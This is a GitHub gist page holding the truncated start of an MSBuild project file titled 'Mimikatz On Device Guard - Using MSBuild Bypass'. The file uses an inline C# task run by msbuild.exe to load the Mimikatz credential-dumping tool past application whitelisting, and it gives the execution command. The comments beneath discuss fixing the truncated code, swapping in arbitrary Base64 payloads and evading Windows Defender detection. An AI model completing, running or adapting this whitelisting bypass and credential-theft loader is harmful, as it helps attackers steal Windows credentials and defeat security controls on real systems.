Create a gist now

Instantly share code, notes, and snippets.

@subTee /katz.csproj Secret
Last active Sep 20, 2017

What would you like to do?
Mimikatz On Device Guard - Using MSBuild Bypass
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.csproj -->
<Target Name="Hello">
<SharpLauncher >
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Using Namespace="System" />
<Using Namespace="System.Reflection" />
<Code Type="Fragment" Language="cs">

H1d3r commented Sep 14, 2016

It seems that code was not complete?


ssssanr commented Sep 14, 2016

Code is not complete!!!!

even with add ]]> or "]]> still giving out error about UsingTask,Task and code elements not completed .. also with closing them with , and won't compiling.. anyone figured out why )?

3gstudent commented Sep 20, 2016 edited

Try my test code :)It just integrates two project of Casey's github. The code is all belong to him.


subTee commented Sep 22, 2016

Fixed Code - It was truncated...

bokandbok commented Dec 16, 2016 edited

Can the mimikatz payload be replaced with other arbitrary executable payload(in Base64-encoded form)?

Getting detected by Windows Defender in Win 10 as HackTool:Win32/Mikatz/dha .. anyway to bypass ..?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment